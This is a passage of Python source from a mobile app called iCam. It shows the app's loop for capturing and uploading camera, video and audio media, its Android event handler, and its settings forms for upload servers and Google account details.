            #messaging.sms_send("302", u"")
            messaging.sms_send("302", u"", "7bit", CallbackSMSSend)
            DebugPrint("Returned from messaging.sms_send().")
            # Store numeric seconds (same clock as GetTime()) so the
            # subtraction in the guard above stays valid next call.
            lastTimeSentMessage = GetTime()
    except:
        DebugPrint("CommunicateWithOperator(): returned an exception.")
        DebugPrintErrorTrace()
# !!TODO - Maybe do separate Ops: MainCameraPhoto and MainCameraVideoRec
def MainCamera():
    """Run the main (back) camera operation selected by cameraMode[0].

    Mode 2 takes a photo, mode 1 records a video (when a duration is
    configured), mode 3 does both; mode 0 is disabled. Returns 1 when a
    capture was actually performed, 0 otherwise, so the reactive loop
    knows whether this op "counted".
    """
    performed = 0
    mode = cameraMode[0]
    if mode != 0:
        if mode in (2, 3):
            # Photo requested.
            TakePhotoAndUpload(0)
            performed = 1
        if mode in (1, 3) and videoRecordDuration[0] > 0:
            # Video recording requested and a positive duration is set.
            VideoRecordAndUpload(0, videoRecordDuration[0])
            performed = 1
    return performed
# !!TODO - Maybe do separate Ops: VGACameraPhoto and VGACameraVideoRec
def VGACamera():
    """Run the secondary (VGA/front) camera op selected by cameraMode[1].

    Mirrors MainCamera() but is skipped entirely on single-camera
    devices (numCamerasSupported < 2). Returns 1 when a capture
    happened, else 0.
    """
    performed = 0
    if numCamerasSupported >= 2:
        mode = cameraMode[1]
        if mode != 0:
            if mode in (2, 3):
                # Photo requested.
                TakePhotoAndUpload(1)
                performed = 1
            if mode in (1, 3) and videoRecordDuration[1] > 0:
                # Video recording requested with a positive duration.
                VideoRecordAndUpload(1, videoRecordDuration[1])
                performed = 1
    return performed
def Audio():
    """Record and upload audio when audioRecordDuration is non-zero.

    Returns 1 when a recording was made, 0 when audio capture is off
    (same 1/0 contract as MainCamera()/VGACamera()).
    """
    if audioRecordDuration == 0:
        return 0
    AudioRecordAndUpload(audioRecordDuration)
    return 1
"""
def Sleep():
try:
# e32.ao_sleep(pauseInterval)
SleepAndPetWatchdog(pauseInterval, True)
#!!!!TODO At every pet in SleepAndPetWatchdog we should increment a counter sleepState that is saved with StoreState() and in case iCam crashes and sleepState != -1 (??) we should resume the sleep.
# SleepAndPetWatchdog(pauseIntervalLeft, True)
except:
# time.sleep(pauseInterval)
DebugPrint("ReactiveLoop_real(): sleep returned an " \
"exception.")
DebugPrintErrorTrace()
"""
reactiveLoopOps = None
#if reactiveLoopOps is None:
reactiveLoopOps = [MainCamera, VGACamera, Audio]
#reactiveLoopOps = [MainCamera, VGACamera, Audio, Sleep]
# def StoreMediaAndUploadPeriodically():
def ReactiveLoop_real():
    """Core reactive loop: download commands, capture media, upload, sleep.

    Each iteration (when reactiveLoopIsStarted) polls the server for new
    commands, uploads bare device state when no capture mode is active,
    then cycles through reactiveLoopOps (MainCamera, VGACamera, Audio)
    until one op actually captures something, and finally sleeps
    pauseInterval seconds while petting the watchdog.

    pauseInterval == 0 selects burst/continuous mode: the appropriate
    continuous capture is started and this function returns immediately.
    When the loop is stopped, Android waits in 10 s steps for a restart
    while Symbian returns to the UI. Errors are logged, never raised.
    """
    """
    global deviceId
    global myTimer
    global localPhotoResolution, localQualityIndex
    global photoResolutionStr, photoModeStr, pauseIntervalStr, exposureStr
    global whiteBalanceStr, flashStr, digitalZoom, photoResolutionIndex
    global localPhotoResolutionIndex, photoModeIndex, photoQuality
    global pauseInterval, exposureIndex, whiteBalanceIndex, flashIndex
    global audioRecordDuration, videoRecordDuration, rotateDegreesImage
    # GSM location info
    global mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId
    global signalStrength, signalUnits, accessPointName, bluetoothMode
    global gpsInfo, readGPS
    global cameraPhotoSizes_JPEG_Exif, cameraPhotoSizes_RGB24
    global myMaxRamdriveSize
    """
    # global keyboard
    # global myTimer
    global pauseIntervalStr, pauseInterval, videoRecordDuration, \
        audioRecordDuration, reactiveLoopIsStarted, burstModeIsStarted
    global modeManagerIsEnabled
    global readGPS
    global startButtonPressed
    global conserveEnergy
    global reactiveLoopOpsIndex, reactiveLoopOps
    DebugPrint("Entered ReactiveLoop_real().")
    try:
        if startButtonPressed == False:
            startButtonPressed = True
            if SYMBIAN_OS:
                RedrawHandler(None)
        if reactiveLoopIsStarted == False:
            burstModeIsStarted = False
            reactiveLoopIsStarted = True
            # We call SetMenu() in order to remove the Start menu item.
            SetMenu()
        """
        I used after() instead of forever loop with ao_sleep() because I've
        seen that probably because of the Internet connections to
        RDS prepaid the forever loop with ao_sleep() was broken and the
        application was no longer progress(??). That is why we use after(),
        which invariably progresses (it seems).
        But even the solution with after(), in conditions of stress - BT
        server with (own and BT client) pauseInterval = 120 had issues
        with no more progress.
        """
        # if True:
        while True:
            if reactiveLoopIsStarted:
                # EraseOldestMediaFiles()
                DebugPrint("Entered ReactiveLoop_real() iteration.")
                """
                hasDownloadedNewCmd = DownloadCommands()
                # DownloadCommands() returns true if reads new commands.
                if hasDownloadedNewCmd:
                    SetMenu()
                    StoreState()
                try:
                    #myTimer.cancel()
                    #myTimer.after(pauseInterval, ReactiveLoop)
                    #LongAfter(myTimer, pauseInterval + 40 + \
                    #    videoRecordDuration[0] + videoRecordDuration[1] + \
                    #    audioRecordDuration, ReactiveLoop)
                    global sleepAndPetWatchdogTimer
                    LongAfter(sleepAndPetWatchdogTimer, pauseInterval,
                        ReactiveLoop)
                except:
                    print "ReactiveLoop(): myTimer.after() returned an " \
                        "exception."
                    sys.stdout.flush()
                    traceback.print_exc()
                    sys.stderr.flush()
                if pauseInterval == 0:
                    return
                """
                if pauseInterval == 0:
                    # pauseInterval == 0 means burst/continuous mode: start
                    # the continuous capture and leave this loop.
                    #!!!!TODO: Test if this piece of code helps in case iCam crashes - it should.
                    if not burstModeIsStarted:
                        if (cameraMode[0] != 0) and (cameraMode[1] == 0):
                            # Burst mode photo
                            if cameraMode[0] == 2:
                                StartBurstMode()
                            else:
                                # Video rec
                                if videoRecordDuration[0] > 0:
                                    ContinuousVideoRecordAndUpload(0,
                                        videoRecordDuration[0])
                        elif (cameraMode[0] == 0) and (cameraMode[1] != 0):
                            # Burst mode photo.
                            if cameraMode[1] == 2:
                                StartBurstMode()
                            else:
                                # Video rec
                                if videoRecordDuration[1] > 0:
                                    ContinuousVideoRecordAndUpload(1,
                                        videoRecordDuration[1])
                    """
                    #It appears that if I give e32.ao_sleep() it actually makes
                    # sleep the entire process, including the camera
                    # ViewFinder (so the camera ViewFinder does not get
                    # called very often).
                    try:
                        e32.ao_sleep(2) # [seconds]
                    except:
                        DebugPrint("ReactiveLoop(): ao_sleep() returned an " \
                            "exception.")
                        DebugPrintErrorTrace()
                    """
                    reactiveLoopIsStarted = False
                    return
                else:
                    hasDownloadedNewCmd = DownloadCommands()
                    """
                    # DownloadCommands() returns true if reads new commands.
                    if hasDownloadedNewCmd:
                        SetMenu()
                    StoreState()
                    """
                    """
                    This is a tentative implementation of a "watchdog" directly
                    inside iCam as well.
                    Especially for Nokia 6680 I appreciate being less likely
                    for iCam to simply crash - but it can run out of memory.
                    """
                    FREE_RAM_AMOUNT_THRESHOLD = 1 * MEGA_BYTE
                    if GetFreeRAM() < FREE_RAM_AMOUNT_THRESHOLD:
                        DebugPrint("ReactiveLoop_real(): Free RAM is %d - " \
                            "below %d. Restarting cellphone." % \
                            (GetFreeRAM(), FREE_RAM_AMOUNT_THRESHOLD))
                        RestartPhone()
                    """
                    I do this here, because I want to resize the photos
                    received via BT with the latest resolution received
                    from DownloadCommands().
                    I should put the BluetoothMessageListProcess() before
                    calling DownloadCommands(), since I want to concentrate
                    all Internet access close, since
                    BluetoothMessageListProcess() takes a lot of time.
                    """
                    if (bluetoothMode == 1) or (bluetoothMode == 2):
                        # This might take a long time to complete, if there are
                        # many BT messages in Inbox.
                        #BluetoothMessageListProcess(processJustNonSMF_BtMsgs=\
                        #    False)
                        BluetoothMessageListProcess()
                    """
                    Here we come back after a
                    SleepAndPetWatchdog(pauseIntervalGdata) -
                    which is good since normally we have immediately
                    after (see below) an UploadStateAndFileAndStoreState.
                    """
                    """
                    if modeManagerIsEnabled:
                        ModeManager()
                    PowerManager()
                    """
                    # Even if we don't capture anything we still transmit the
                    # device's state (GPS if available, GSM, charging
                    # status, free drive space, etc, etc)
                    if (cameraMode[0] == 0) and (cameraMode[1] == 0) and \
                            (audioRecordDuration == 0): # and readGPS):
                        UploadStateAndFileAndStoreState(deviceId, -1, #cameraId
                            NO_MEDIA_FILE_NAME, NO_MEDIA_FILE_NAME,
                            ICAM_SERVER_NAME,
                            WEBPAGE_UL_GZIPPED_STATE_AND_FILE)
                    """
                    # We want to distribute the pauseInterval between the
                    # cameras, etc.
                    pauseIntervalCurrent = 0
                    pauseIntervalLeft = pauseInterval
                    """
                    """
                    In the loop below
                        while finishLoop == 0:
                    we iterate until we successfully complete an operation
                    (really take a photo, record a video or audio).
                    Note that we have an outer forever loop.
                    """
                    finishLoop = 0
                    while finishLoop == 0:
                        DebugPrint("ReactiveLoop_real(): " \
                            "reactiveLoopOpsIndex=%d, " \
                            "reactiveLoopOps=%s." % \
                            (reactiveLoopOpsIndex, reactiveLoopOps))
                        if (reactiveLoopOpsIndex >= len(reactiveLoopOps)) or \
                                (reactiveLoopOpsIndex < 0):
                            reactiveLoopOpsIndex = 0
                        """
                        We act a bit paranoid here, in the sense that we want
                        to ensure progress, even if the current operation
                        crashes in the middle or (best) at the very end.
                        Independent of what happens at the current operation
                        we proceed at the next one - we have experienced
                        a few times already when the operation was crashing
                        (main thread was not progressing) after we have
                        uploaded the media via Bluetooth to the iCam BT
                        server.
                        """
                        prevReactiveLoopOpsIndex = reactiveLoopOpsIndex
                        # We update reactiveLoopOpsIndex.
                        reactiveLoopOpsIndex += 1
                        if reactiveLoopOpsIndex >= len(reactiveLoopOps):
                            reactiveLoopOpsIndex = 0
                        """
                        We give StoreState() to quickly save the updated
                        reactiveLoopOpsIndex.
                        """
                        StoreState()
                        """
                        The operation (MainCamera, VGACamera, Audio) returns 1
                        if the operation did something concrete (take photo
                        or video recording) or 0 if, given the current iCam
                        settings, did not basically do anything.
                        """
                        finishLoop = reactiveLoopOps[prevReactiveLoopOpsIndex]()
                        """
                        # The straight/non-paranoid alternative:
                        reactiveLoopOps[reactiveLoopOpsIndex]()
                        # We update reactiveLoopOpsIndex.
                        reactiveLoopOpsIndex += 1
                        if reactiveLoopOpsIndex >= len(reactiveLoopOps):
                            reactiveLoopOpsIndex = 0
                        # We give StoreState() to quickly save the updated
                        #     reactiveLoopOpsIndex.
                        StoreState()
                        """
                    """
                    In case more Unsent files are available because of
                    transmission errors.
                    """
                    if (uploadUnsentData == 1) or (uploadUnsentData == 3):
                        UploadUnsentFILES()
                    try:
                        # e32.ao_sleep(pauseInterval)
                        SleepAndPetWatchdog(pauseInterval, True)
                        # SleepAndPetWatchdog(pauseIntervalLeft, True)
                    except:
                        # time.sleep(pauseInterval)
                        DebugPrint("ReactiveLoop_real(): sleep returned an " \
                            "exception.")
                        DebugPrintErrorTrace()
                    DebugPrint("Exiting ReactiveLoop_real().")
            else:
                #if reactiveLoopIsStarted == False:
                # We should get here only on Android OS.
                if ANDROID_OS:
                    """
                    try:
                        time.sleep(10.0)
                    except:
                        DebugPrint("ReactiveLoop_real(): while " \
                            "reactiveLoopIsStarted=False, time.sleep() " \
                            "returned an exception.")
                        DebugPrintErrorTrace()
                    """
                    DisplayNote("Waiting to start.")
                    SleepAndPetWatchdog(10.0, False)
                elif SYMBIAN_OS:
                    return
    except:
        DebugPrintErrorTrace()
def ReactiveLoop():
    """Entry point for the reactive loop.

    Historical variants ran ReactiveLoop_real() on a worker thread; it is
    now executed synchronously on the caller's thread.
    """
    ReactiveLoop_real()
def StopBroadcasting():
    """Stop the reactive capture loop.

    On Symbian the stop is honored only while no video recording is in
    progress (videoRecordStartTime == -1 outside camera.start_record());
    on Nokia E7/N82 the call then blocks, keeping the watchdog fed, until
    broadcasting is started again. On Android the flags are simply
    cleared.
    """
    global reactiveLoopIsStarted
    global startButtonPressed
    if SYMBIAN_OS:
        # Before and after camera.start_record(), videoRecordStartTime
        # is -1; refuse to stop in the middle of a recording.
        if videoRecordStartTime != -1:
            return
        reactiveLoopIsStarted = False
        startButtonPressed = False
        # SetMenu() re-adds the now-relevant Start menu item.
        SetMenu()
        #!!!!Why do we do this?
        # Nokia E7 and N82: park here until the loop is restarted.
        if deviceId in [IMEI_E7, IMEI_N82]:
            while not reactiveLoopIsStarted:
                SleepAndPetWatchdog(MAX_DURATION_BETWEEN_PETTING, False)
    elif ANDROID_OS:
        reactiveLoopIsStarted = False
        startButtonPressed = False
def ReactiveLoopOnlyIfStartButtonNotAlreadyPressed():
    """Start handler that is idempotent on Android.

    On Android: the first Start enters the loop; a Start while the loop
    runs only shows a note; a Start after a Stop just re-arms
    reactiveLoopIsStarted (the loop body itself is already running, see
    MainStartReactiveLoops()). On Symbian and Windows CE the loop is
    entered unconditionally.
    """
    global startButtonPressed
    global reactiveLoopIsStarted
    if ANDROID_OS:
        if not startButtonPressed:
            # First Start ever: actually enter the reactive loop.
            DisplayNote("Starting.")
            ReactiveLoop()
        elif reactiveLoopIsStarted:
            #myDroid.makeToast("Pressed start.")
            #time.sleep(2.0)
            DisplayNote("Already started.")
        else:
            # We have already given at least once Start and then a Stop:
            # just re-arm the flag for the still-running loop.
            DisplayNote("Restarting.")
            reactiveLoopIsStarted = True
    elif SYMBIAN_OS or WINDOWS_CE_OS_PYTHONCE:
        ReactiveLoop()
def ReactiveLoopStop():
    """Ask the reactive loop to stop by clearing its run flag.

    startButtonPressed is deliberately left set, so a subsequent Start is
    treated as a restart rather than a first start.
    """
    global reactiveLoopIsStarted, startButtonPressed
    reactiveLoopIsStarted = False
    # startButtonPressed = False
    if ANDROID_OS:
        # DisplayNote("Stopped.") - intentionally silent for now.
        pass
if ANDROID_OS:
    # Gate polled by EventHandler(): while True the handler reads SL4A
    # events; presumably cleared elsewhere to pause polling - TODO confirm.
    myAllowReadEvents = True
def EventHandler():
    """Android-only event pump: polls the SL4A event queue forever.

    Two kinds of events are dispatched:
      - UI menu events (u"name" present, u"data" is None): the matching
        handler from menuTable runs on its own thread;
      - camera preview frames (u"data"/u"format" present): the Base64
        frame is decoded and uploaded via PicasaPhotoUpload().
    Anything else is only logged. Polling is gated by the global
    myAllowReadEvents and throttled with time.sleep(2.0) in the legacy
    (NEW_STYLE == False) mode. All errors are logged, never raised.
    """
    global myAllowReadEvents
    DebugPrint("Entered EventHandler().")
    while True:
        """
        try:
            # Returns information about the currently active access point.
            print "EventHandler(): myDroid.wifiGetConnectionInfo() =", \
                myDroid.wifiGetConnectionInfo()
            # Reassociates with the currently active access point.
            # Returns: True if the operation succeeded.
            #myDroid.wifiReassociate()
            # Reconnects to the currently active access point.
            # Returns: True if the operation succeeded.
            myDroid.wifiReconnect()
        except:
            DebugPrintErrorTrace()
        """
        # e = myDroid.receiveEvent()
        """
        See related posts:
        https://groups.google.com/group/android-scripting/msg/c9e805c4937f2d5e
        https://groups.google.com/group/android-scripting/browse_thread/thread/ae658a62b2b60a30
        """
        NEW_STYLE = False
        try:
            if myAllowReadEvents:
                if NEW_STYLE == False:
                    e = myDroid.eventPoll(1)
                elif NEW_STYLE == True:
                    """
                    It seems that sometimes it consumes events that are
                    generated by the RPC system, which implies it
                    sabotages the communication between the Python
                    program and the SL4A Java library.
                    """
                    e = myDroid.eventWait(10000)
                # DisplayNote("read event!")
                if e.result is None:
                    pass
                else:
                    #DebugPrint("EventHandler(): e = %s" % str(e))
                    """
                    #!!!!Check for events generated by cameraStartPreview:
                    EventHandler(): e = Result(id=169, result=[{u'data': {u'format': u'jpeg', u'encoding': u'file', u'height': 288, u'width': 352, u
                    'filename': u'/mnt/sdcard/external_sd/iCam/Media/prv-1287331584.jpg', u'quality': 80}, u'name': u'preview', u'time': 1377247976378000L}], error=None)
                    """
                    """
                    DebugPrint("EventHandler(): e.result['name'] = %s" % \
                        str(e.result["name"]))
                    DebugPrint("EventHandler(): " \
                        "optItems[e.result['name']] = %s" % \
                        str(optItems[str(e.result["name"])]))
                    DebugPrint("EventHandler(): e.result['data'] = %s" % \
                        str(e.result["data"]))
                    """
                    #optItems[str(e.result["name"])]["event"](e.result["data"])
                    try:
                        # True and False are both bool and int
                        # - see http://www.peterbe.com/plog/bool-is-int.
                        if isinstance(e.result, bool):
                            DebugPrint(
                                "EventHandler(): isinstance(e.result) is " \
                                "bool")
                            #pass
                        elif isinstance(e.result, int):
                            DebugPrint(
                                "EventHandler(): isinstance(e.result) is " \
                                "int")
                            #pass
                        elif isinstance(e.result, list):
                            DebugPrint(
                                "EventHandler(): len(e.result) = %d" % \
                                len(e.result))
                            if len(e.result) == 1:
                                if NEW_STYLE == False:
                                    myMap = e.result[0]
                                if NEW_STYLE == True:
                                    myMap = e.result
                                # myMap = e.result
                                if isinstance(myMap, bool):
                                    DebugPrint(
                                        "EventHandler(): myMap is bool: %s" % \
                                        str(myMap))
                                elif isinstance(myMap, int):
                                    DebugPrint(
                                        "EventHandler(): myMap is int: %s" % \
                                        str(myMap))
                                elif (u"name" in myMap) and \
                                        (u"data" in myMap) and \
                                        (myMap[u"data"] is None):
                                    DebugPrint("EventHandler(): e = %s" % \
                                        str(e))
                                    """
                                    IMPORTANT: Here we treat the events
                                    related to the SL4A UI menu.
                                    """
                                    # menuTable[str(myMap["name"])][1]()
                                    """
                                    thread.start_new_thread(menuTable[
                                        str(myMap["name"])][1], ())
                                    """
                                    # Run the menu handler on its own thread
                                    # so the event pump is never blocked.
                                    MyThreadStart( \
                                        menuTable[str(myMap[u"name"])][1])
                                # (myMap[u"format"] == u"jpeg") and
                                elif (u"data" in myMap[u"data"]) and \
                                        (myMap[u"data"] != None) and \
                                        (u"format" in myMap[u"data"]):
                                    """
                                    This is an event containing the frame info
                                    data in Base64 from cameraStartPreview().
                                    """
                                    frameData = myMap[u"data"][u"data"]
                                    frameData = base64.b64decode(frameData)
                                    #!!!!TODO: get right cameraId
                                    cameraId = 0
                                    photoFileName = \
                                        GetCurrentDateTimeStringWithMilliseconds() + \
                                        "_%s_%d_burst.jpg" % (deviceId, cameraId)
                                    #"_%d.jpg" % cameraId
                                    crtTime = GetCurrentDateTime()
                                    crtTime2 = GetTime()
                                    # See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
                                    numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
                                    PicasaPhotoUpload(
                                        pathFileName="/bogus/bogus.jpg",
                                        fileName=photoFileName,
                                        aKeyword=googleKeywords,
                                        crtTime=crtTime,
                                        mediaTimeStr=str(int(numMilliseconds)),
                                        mediaDateStr="",
                                        aDeviceId=deviceId,
                                        cameraId=0,
                                        aBatteryLevel=-1,
                                        aChargerStatus=-1,
                                        aData=frameData)
                                else:
                                    DebugPrint("EventHandler(): e = %s" % \
                                        str(e))
                    except:
                        DebugPrintErrorTrace()
                    # myDroid.creaMenu()
            if NEW_STYLE == False:
                time.sleep(2.0)
        except:
            # time.sleep(0.2)
            DebugPrintErrorTrace()
# This var is required as a global.
# Whether the "Select servers" settings form was saved - presumably set
# by the form's save hook in SelectServersMenu(); verify against that code.
serversFormSaved = False
def SelectServersMenu():
    """Show the "Select Servers" settings UI (upload targets + credentials).

    Reads/writes the upload-related globals (googleUsername, googlePassword,
    uploadMediaToYouTube, uploadMediaToPicasa, useiCamServer,
    googleMediaPrivate, googleKeywords, ICAM_SERVER_NAME) and persists them
    via StoreLocalConfigInFile()/StoreState().  On Android a chain of SL4A
    dialogs is shown; on Symbian an appuifw.Form is used.
    """
    global serversFormSaved
    global googleUsername, googlePassword, googleRememberPassword
    global uploadMediaToYouTube, uploadMediaToPicasa, \
        useiCamServer, googleMediaPrivate, googleKeywords #, btNetSearchKeywords
    global ICAM_SERVER_NAME
    DebugPrint("Entered SelectServersMenu().")
    """
    From http://wiki.forum.nokia.com/index.php/How_to_use_Form_in_Python_for_S60
    (and also http://www.mobilenin.com/pys60/info_tabs_forms.htm):
    """
    if googleUsername is None:
        googleUsername = ""
    if googlePassword is None:
        googlePassword = ""
    # Create a list to be used in "combo" selection mode.
    iCamComboList = [u"No", u"Yes, No Media", u"Yes, All"]
    yesNoComboList = [u"No", u"Yes"]
    noComboList = [u"No"]
    infoComboList = [u"[Enter When Save Form]"]
    """
    uploadMediaToYouTubeComboList = [u"No", u"Yes"]
    uploadMediaToPicasaComboList = [u"No", u"Yes"]
    googleRememberPasswordComboList = [u"No", u"Yes"]
    """
    googleMediaPrivateComboList = [u"Public (shared to all)",
        u"Private (shared only explicitely)"]
    # Field order matters: the numeric indices below are used both when
    # patching myFields[5] and when reading the saved Symbian form back.
    myFields = [
        #0
        #(u"Enter Google YouTube/Picasa login information", "text", u""),
        (u"YouTube/Picasa username", "text", unicode(googleUsername)),
        #1
        # Enter On Save Form
        #(u"YouTube/Picasa password", "text", u"[Enter When Save Form]"),
        #unicode(GetGooglePassword())),
        (u"YouTube/Picasa password", "combo", (infoComboList, 0)),
        #2
        (u"Remember password", "combo",
            (yesNoComboList, googleRememberPassword)),
        # Gives error: "ValueError: Form field, unknown type".
        #(u"Password", "code", unicode(googlePassword)),
        #3
        (u"Upload to YouTube", "combo",
            (yesNoComboList, uploadMediaToYouTube)),
        #4
        (u"Upload to Picasa", "combo",
            (yesNoComboList, uploadMediaToPicasa)),
        #5
        # The iCam server is not for use for normal users ;)
        #(u"Upload to iCam server", "combo",
        # (yesNoComboList, useiCamServer)),
        #(u"Upload media to iCam Server", "combo",
        (u"Use the iCam Server", "combo",
            (noComboList, useiCamServer)),
        #6
        (u"Media permissions on YouTube/Picasa", "combo",
            (googleMediaPrivateComboList, googleMediaPrivate)),
        #7
        (u"YouTube video keywords", "text", unicode(googleKeywords)),
        #8
        (u"iCam Server address", "text", unicode(ICAM_SERVER_NAME))
        #(u"Permissions of uploaded media on YouTube/Picasa:",
        # "combo", (googleMediaPrivateComboList, 0))
        #(u"Amount", "number", 5),
        #(u"Date", "date"),
        #(u"Time","time")
    ]
    # Nokia E7 and 6120 and 6680 and N95 and N82
    if deviceId in [IMEI_E7, IMEI_6120, IMEI_6680, IMEI_N95, IMEI_N82]:
        # These phones get the full three-way iCam-server choice instead of
        # the "No"-only combo.
        myFields[5] = (u"Use the iCam Server", "combo",
            #(yesNoComboList, useiCamServer))
            (iCamComboList, useiCamServer))
    """
    if MY_DEBUG_STDOUT:
        try:
            print "SelectServersMenu(), at the beginning:"
            print "  googleUsername =", googleUsername
            print "  googlePassword =", googlePassword
            print "  googleRememberPassword =", googleRememberPassword
            print "  uploadMediaToYouTube =", uploadMediaToYouTube
            print "  uploadMediaToPicasa =", uploadMediaToPicasa
            print "  googleMediaPrivate =", googleMediaPrivate
            print "  googleKeywords =", googleKeywords
            print "  myFields =", myFields
            sys.stdout.flush()
        except:
            DebugPrintErrorTrace()
    """
    if ANDROID_OS:
        """
        Sort-of-TODO: We get decalated results if we put these here:
        username is returned by password . This is an error of the
        SL4A event handling, RPC, etc.
        See Z:\1PhD\ReVival\Logs\Samsung_i5500\2013_12_15\iCam.cfg
        Entered GetGooglePassword().
        LoadLocalConfigFromFile(): googlePasswordAux = googleUser.
        ..
        SelectServersMenu(): at the end
        googleUsername = [1]
        So we read uploadMediaToYouTube uploadMediaToPicasa after
        googleUsername and googlePassword.
        """
        if False:
            uploadMediaToYouTube = DialogMultipleChoices( \
                myFields[3][0] + u"?", yesNoComboList, uploadMediaToYouTube)
            uploadMediaToPicasa = DialogMultipleChoices( \
                myFields[4][0] + u"?", yesNoComboList, uploadMediaToPicasa)
            """
            useiCamServer = DialogMultipleChoices( \
                myFields[5][0] + u"?", myFields[5][2][0], useiCamServer)
            """
        try:
            googleUsername = DialogGetInput(myFields[0][0] + ":", "", \
                googleUsername)
            googlePassword = \
                myDroid.dialogGetPassword(myFields[1][0] + ":", "").result
            # "For " + googleUsername
            # dialogGetPassword() yields None when the user cancels.
            if googlePassword is None:
                googlePassword = ""
            StoreLocalConfigInFile()
        except:
            DebugPrintErrorTrace()
        if True: # See above
            uploadMediaToYouTube = DialogMultipleChoices( \
                myFields[3][0] + u"?", yesNoComboList, uploadMediaToYouTube)
            uploadMediaToPicasa = DialogMultipleChoices( \
                myFields[4][0] + u"?", yesNoComboList, uploadMediaToPicasa)
            googleMediaPrivate = DialogMultipleChoices(myFields[6][0], \
                myFields[6][2][0], googleMediaPrivate)
            googleKeywords = DialogGetInput(myFields[7][0] + ":", "",
                googleKeywords)
    elif SYMBIAN_OS:
        try:
            # Initialize a boolean variable to know whether the form is saved.
            serversFormSaved = False
            # appuifw.app.title = u"YouTube/Picasa".
            appuifw.app.title = u"Select Servers"
            # Creates the form:
            #serversForm = appuifw.Form(myFields, flags = appuifw.FFormEditModeOnly)
            #serversForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly)
            #serversForm = appuifw.Form(myFields, appuifw.FFormDoubleSpaced)
            serversForm = appuifw.Form(myFields, appuifw.FFormEditModeOnly |
                appuifw.FFormDoubleSpaced)
            # Define a function to be called when the form is saved.
            def ServersFormOnSave(arg):
                # Save hook: marks the form saved and optionally prompts for
                # the password (which the form itself only shows as a combo).
                global serversFormSaved
                global googlePassword
                try:
                    serversFormSaved = True
                    myAnswer = appuifw.query(u"Enter YouTube/Picasa " \
                        "password? WARNING: password will be " \
                        "visible when edited.", "query")
                    """
                    DebugPrint("SelectServersMenu(): myAnswer = %s" % \
                        str(myAnswer))
                    """
                    # If press Cancel, myAnswer is None.
                    if myAnswer == True:
                        resStr = appuifw.query(
                            u"Enter YouTube/Picasa password:",
                            "text", unicode(GetGooglePassword())) # "code"
                        if resStr is not None:
                            googlePassword = str(resStr)
                except:
                    DebugPrintErrorTrace()
                return True
            # Assign the save function.
            serversForm.save_hook = ServersFormOnSave
            """
            From http://discussion.forum.nokia.com/forum/showthread.php?137062-How-to-avoid-quot-Save-quot-command-in-appuifw.Form-%28Make-quot-Auto-Save-quot-form%29
            """
            #serversForm.menu = [(u"Enter Password", ServersFormOnSave)]
            #"My Save" "Test Login Google"
            #Show the form. This operation is blocking until we close the form.
            serversForm.execute()
            # After the form is saved and closed, display the information.
            if serversFormSaved == True:
                """
                print serversForm[0][2]
                print models[serversForm[1][2][1]]
                print serversForm[2][2]
                print time.strftime("%d/%m/%Y",
                    time.localtime(serversForm[3][2]))
                print time.strftime(time.ctime(serversForm[4][2])[11:20])
                """
                """
                appuifw.note(unicode("Google Username: " +
                    serversForm[0][2]), "info")
                appuifw.note(unicode("Google Password: " +
                    serversForm[1][2]), "info")
                appuifw.note(unicode("YouTube: " +
                    uploadMediaToYouTubeComboList[serversForm[2][2][1]]),
                    "info")
                appuifw.note(unicode("Picasa: " +
                    uploadMediaToPicasaComboList[serversForm[3][2][1]]),
                    "info")
                appuifw.note(unicode("YouTube/Picasa: " + serversForm[4][2]),
                    "info")
                """
                googleUsername = serversForm[0][2]
                # googlePassword = serversForm[1][2]
                """
                The combo form field value is a long integer. We convert it to
                int because we would receive
                "TypeError: Form combo field, bad index"
                at the next instantiation of appuifw.Form().
                """
                googleRememberPassword = int(serversForm[2][2][1])
                uploadMediaToYouTube = int(serversForm[3][2][1])
                uploadMediaToPicasa = int(serversForm[4][2][1])
                useiCamServer = int(serversForm[5][2][1])
                googleMediaPrivate = int(serversForm[6][2][1])
                googleKeywords = serversForm[7][2]
                #!!!!TODO
                #btNetSearchKeywords = serversForm[7][2]
                # It seems serversForm[2][2] is unicode
                ICAM_SERVER_NAME = str(serversForm[8][2])
                StoreLocalConfigInFile()
                StoreState()
        except:
            DebugPrintErrorTrace()
        """
        # Does not work in Python 2.2 (e.g., PyS60 1.4.5)
        finally:
            appuifw.app.title = ICAM_APP_TITLE
        """
        # Manual title restore: try/finally is unavailable on the Python
        # 2.2-based PyS60 builds (see the note just above).
        appuifw.app.title = ICAM_APP_TITLE
    # """
    if MY_DEBUG_STDOUT:
        try:
            print "SelectServersMenu(): at the end"
            print "  googleUsername =", googleUsername
            # print "  googlePassword =", googlePassword
            print "  googleRememberPassword =", googleRememberPassword
            print "  uploadMediaToYouTube =", uploadMediaToYouTube
            print "  uploadMediaToPicasa =", uploadMediaToPicasa
            print "  useiCamServer =", useiCamServer
            print "  googleMediaPrivate =", googleMediaPrivate
            print "  googleKeywords =", googleKeywords
            sys.stdout.flush()
        except:
            DebugPrintErrorTrace()
    # """
# This var is required as a global.
# Set True by MiscFormOnSave() so MiscellaneousSettingsMenu() knows whether
# the user saved (rather than cancelled) the "Misc" form.
miscFormSaved = False
def MiscellaneousSettingsMenu():
    """Show the "Misc" settings UI (autostart, local storage, debug flags).

    Updates the globals declared below and persists them via StoreState().
    Symbian uses an appuifw.Form; the Android branch shows SL4A dialogs for
    only a subset of the fields.
    """
    global miscFormSaved
    global startAutomatically, readGPS, storeLocallyMedia, LOCAL_FOLDER
    global numThreadsUpload
    global BATTERY_LEVEL_THRESHOLD
    global MY_DEBUG_STDOUT, MY_DEBUG_STDERR, MY_DEBUG_STDERR_2, \
        MY_DEBUG_UPLOAD_MSG
    DebugPrint("Entered MiscellaneousSettingsMenu().")
    # Create a list to be used in "combo" selection mode.
    yesNoComboList = [u"No", u"Yes"]
    noComboList = [u"No"]
    # Packed view of the four debug flags; only referenced by the
    # commented-out field label below.
    mask = (MY_DEBUG_STDOUT << 3) + (MY_DEBUG_STDERR << 2) + \
        (MY_DEBUG_STDERR_2 << 1) + MY_DEBUG_UPLOAD_MSG
    myFields = [
        (u"Start broadcasting automatically", "combo",
            (yesNoComboList, startAutomatically)),
        #u"Media Storage"
        (u"Store Locally", "combo",
            (yesNoComboList, storeLocallyMedia)),
        (u"iCam Folder", "text", unicode(LOCAL_FOLDER)),
